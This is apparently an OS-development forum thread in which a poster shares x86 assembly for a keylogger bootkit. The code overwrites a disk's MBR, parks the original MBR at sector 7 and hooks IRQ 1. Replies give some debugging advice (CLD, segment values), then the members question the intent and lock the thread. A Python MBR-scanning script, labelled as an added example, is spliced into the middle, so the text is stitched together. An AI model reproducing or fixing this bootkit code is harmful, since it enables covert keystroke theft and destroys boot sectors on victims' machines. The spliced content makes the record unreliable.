hook irq1 installed at MBR

Apolo
Posts: 4
Joined: Wed Jan 24, 2018 7:26 am

hook irq1 installed at MBR

Post by Apolo »

I am coding a program that hooks IRQ 1 and is installed onto the MBR, and that restores the original MBR, which is saved at sector 7; however, the OS doesn't bootstrap. Here is my code:


org 100h
start:
MOV AX,201H
MOV BX,0E00H
MOV CX,1
MOV DX,80H
INT 13H
MOV AX,301H
MOV CX,7
INT 13H
MOV SI,int9_installer
MOV DI,0E00H
MOV CX,1FDH
REP MOVSB
ES
MOV WORD[0FFEH],0AA55h
MOV AX,301H
MOV CX,1
INT 13H
RET

int9_installer:
cli
push es
mov ax,0
mov es,ax
es
mov cx,[24h]
es
mov dx,[26h]

...

mov cx,0
mov dx,2000h
es
mov [24h],cx
es
mov [26h],dx
pop es
sti
...

mov si,3100h
mov al,10h
mov [si],al
mov al,0
mov [si+1],al
mov al,01
mov [si+2],al
mov al,0
mov [si+3],al
MOV AX,7C00H
mov [si+4],ax
mov ax,0h
mov [si+6],ax
mov ax,7
mov [si+8],ax
xor ax,ax
mov [si+0ah],ax
mov [si+0ch],ax
mov [si+0eh],ax

mov ah,42h
mov dl,80h
INT 13H

JMP 0:7C00H

Where is my code above wrong?
iansjack
Member
Posts: 4689
Joined: Sat Mar 31, 2012 3:07 am
Location: Chichester, UK

Re: hook irq1 installed at MBR

Post by iansjack »

You don't initialize the segment registers, you don't initialize the direction flag, and you set the origin to 100h, which is almost certainly not what you intended. I'm not going to wade through the code to find other mistakes, but those ones need to be corrected first.
AJ
Member
Posts: 2646
Joined: Sun Oct 22, 2006 7:01 am
Location: Devon, UK

Re: hook irq1 installed at MBR

Post by AJ »

Hi,

In addition to iansjack's post, we have absolutely no context for the code. You call this a "program". Does that mean that it is *not* running in a freestanding environment (which could also explain the org directive)?

We also don't have a very good idea of what you expect to see compared with what you actually do see. Can you use some other tool to verify that the sectors are on disk where you expect them to be?

Cheers,
Adam
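AJ's suggestion to use another tool to verify where the sectors really are can be turned into a small defensive check. The following is an added example, not code from this thread: it parses a raw disk image, verifies the 0xAA55 boot signature of sector 0, and scans the gap before the first partition for any other boot-signed sector whose partition table matches the MBR's, which is the footprint a relocated original MBR (like the sector-7 copy discussed here) leaves behind. The 512-byte sector size, the MBR offsets and the sample image are constructed assumptions.

```python
import struct

SECTOR = 512
PT_OFF, SIG_OFF, BOOT_SIG = 0x1BE, 0x1FE, 0xAA55  # partition table, signature offset, signature


def sector(image: bytes, lba: int) -> bytes:
    """Return the 512-byte sector at `lba` of a raw disk image (empty past the end)."""
    return image[lba * SECTOR:(lba + 1) * SECTOR]


def is_boot_signed(sec: bytes) -> bool:
    """True if the sector carries the 0xAA55 boot signature at offset 0x1FE."""
    return len(sec) == SECTOR and struct.unpack_from("<H", sec, SIG_OFF)[0] == BOOT_SIG


def first_partition_lba(mbr: bytes) -> int:
    """Smallest non-zero start LBA of the four 16-byte partition entries (0 if none)."""
    starts = [struct.unpack_from("<I", mbr, PT_OFF + 16 * i + 8)[0] for i in range(4)]
    return min((s for s in starts if s), default=0)


def find_stashed_mbrs(image: bytes) -> dict:
    """Scan the gap between the MBR and the first partition for relocated boot sectors.

    A boot-signed sector there with the same partition table as the MBR is what a
    parked original MBR looks like. Heuristic only: a legitimate second-stage
    loader may also live in that gap, so confirm any hit by hand.
    """
    mbr = sector(image, 0)
    gap_end = first_partition_lba(mbr)
    suspects = []
    for lba in range(1, gap_end):
        sec = sector(image, lba)
        if is_boot_signed(sec):
            same_pt = sec[PT_OFF:SIG_OFF] == mbr[PT_OFF:SIG_OFF]
            suspects.append({"lba": lba, "same_partition_table": same_pt})
    return {"mbr_signed": is_boot_signed(mbr), "gap_end": gap_end, "suspects": suspects}


def build_sample_image() -> bytes:
    """Constructed 16-sector image: replaced MBR in sector 0, original parked in sector 7."""
    entry = struct.pack("<8BII", 0x80, 0, 0, 0, 0x83, 0, 0, 0, 8, 8)  # bootable, starts at LBA 8
    table = entry + b"\x00" * 48
    original = b"\xEB\xFE".ljust(PT_OFF, b"\x90") + table + struct.pack("<H", BOOT_SIG)
    replaced = b"\xCC" * PT_OFF + table + struct.pack("<H", BOOT_SIG)
    img = bytearray(16 * SECTOR)
    img[0:SECTOR] = replaced
    img[7 * SECTOR:8 * SECTOR] = original
    return bytes(img)
```

Run it against a real image with `find_stashed_mbrs(open("disk.img", "rb").read())`; an empty `suspects` list on a disk that should be clean is the expected result.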
Apolo
Posts: 4
Joined: Wed Jan 24, 2018 7:26 am

Re: hook irq1 installed at MBR

Post by Apolo »

My code is a keylogger that hooks IRQ 1 and is installed onto the MBR, and the original MBR is written at sector 7 to be jumped to after my keylogger is installed. The org 100h directive is there because it is written in fasm. How do I set the direction flag, and what value should I set the segment registers to?
iansjack
Member
Posts: 4689
Joined: Sat Mar 31, 2012 3:07 am
Location: Chichester, UK

Re: hook irq1 installed at MBR

Post by iansjack »

I think you need to learn a little more about how the processor works, its state after reset, and the boot sequence before attempting this sort of program. Also, I'm not convinced that you understand the ORG directive.

And, I guess, the question is what are you attempting to achieve by hooking this interrupt. It is, potentially, something that I wouldn't feel comfortable helping with.
Brendan
Member
Posts: 8561
Joined: Sat Jan 15, 2005 12:00 am
Location: At his keyboard!

Re: hook irq1 installed at MBR

Post by Brendan »

Hi,
Apolo wrote: My code is a keylogger that hooks IRQ 1 and is installed onto the MBR, and the original MBR is written at sector 7 to be jumped to after my keylogger is installed. The org 100h directive is there because it is written in fasm. How do I set the direction flag, and what value should I set the segment registers to?
To clear the direction flag, use the CLD instruction.

The BIOS loads the MBR at "some combination of segment:offset that adds up to 0x0007C00". If you set ORG to 0x0100 (telling the assembler to assume the "offset" for the start of your code will be 0x0100) then you'd need your segments to fulfil the equation "0x0007C00 = (segment / 16) + 0x0100". That means you'd need to set segments to 0x07D0. Note that it's much easier to set ORG to 0x00007C00 and set all segments to zero.

For the rest, for assembly language there are only 2 kinds of bugs - the comments don't describe a correct algorithm, or the instructions don't match the comments. Your code has no comments and therefore your code is 100% bugs.

Finally; don't forget that all sane operating systems dispose of the BIOS early during boot and install their own (protected mode or long mode) device drivers with their own IRQ handlers; so (assuming things like TPM and "secureboot" don't do their job) your code still can't work.


Cheers,

Brendan
For all things; perfection is, and will always remain, impossible to achieve in practice. However; by striving for perfection we create things that are as perfect as practically possible. Let the pursuit of perfection be our guide.
AJ
Member
Posts: 2646
Joined: Sun Oct 22, 2006 7:01 am
Location: Devon, UK

Re: hook irq1 installed at MBR

Post by AJ »

That last point is the most important for a keylogger. Any OS worth its salt will end up reinstalling an IDT, and chances are your code will end up in an unmapped memory page anyway.

You'd generally be better off with a hardware key logger, but what you are doing may be at best immoral and at worst illegal!

Before we go further, could you clarify the intention of what you are doing. If you're just playing with boot code on your own machine then fine.

Cheers,
Adam
Apolo
Posts: 4
Joined: Wed Jan 24, 2018 7:26 am

Re: hook irq1 installed at MBR

Post by Apolo »

I think the BIOS of my PCs is all infected, because I tried this most simple code but the PCs still don't bootstrap. See my most simple code:


start:
MOV AX,201H
MOV BX,0E00H
MOV CX,1
MOV DX,80H
INT 13H
MOV CX,7
MOV AX,301H
INT 13H
MOV CX,1BDH
MOV SI,example
MOV DI,0E00H
REP MOVSB
MOV AX,301H
MOV BX,0E00H
MOV AX,301H
MOV CX,1
INT 13H
RET

example:
MOV AX,201H
PUSH ES
MOV BX,0
MOV ES,BX
MOV BX,7C00H
MOV CX,7
INT 13H
POP ES
cs
jmp bx

codesize:
Aaaaaaaaa! What is the problem with my code?
iansjack
Member
Posts: 4689
Joined: Sat Mar 31, 2012 3:07 am
Location: Chichester, UK

Re: hook irq1 installed at MBR

Post by iansjack »

The main problem is that you haven't told us what you are trying to do and why. Until we know that it is unlikely that you will get any further help on this forum. It's devoted to OS development, not hacking.
AJ
Member
Posts: 2646
Joined: Sun Oct 22, 2006 7:01 am
Location: Devon, UK

Re: hook irq1 installed at MBR

Post by AJ »

You have one more attempt at explaining why you are doing this before the thread gets locked. If you are doing this for legit reasons, it sounds like an interesting problem to tackle, but we will also need more of a technical explanation. A bug in your code or methodology is much more likely than your BIOS being infected.

Cheers,
Adam
Apolo
Posts: 4
Joined: Wed Jan 24, 2018 7:26 am

Re: hook irq1 installed at MBR

Post by Apolo »

Summary:

I am trying to bootstrap from sector 7, which is where the original MBR is written. Can someone help me? I am desperate!
AJ
Member
Posts: 2646
Joined: Sun Oct 22, 2006 7:01 am
Location: Devon, UK

Re: hook irq1 installed at MBR

Post by AJ »

Unfortunately locked as promised. I can only assume that this is being done for nefarious purposes...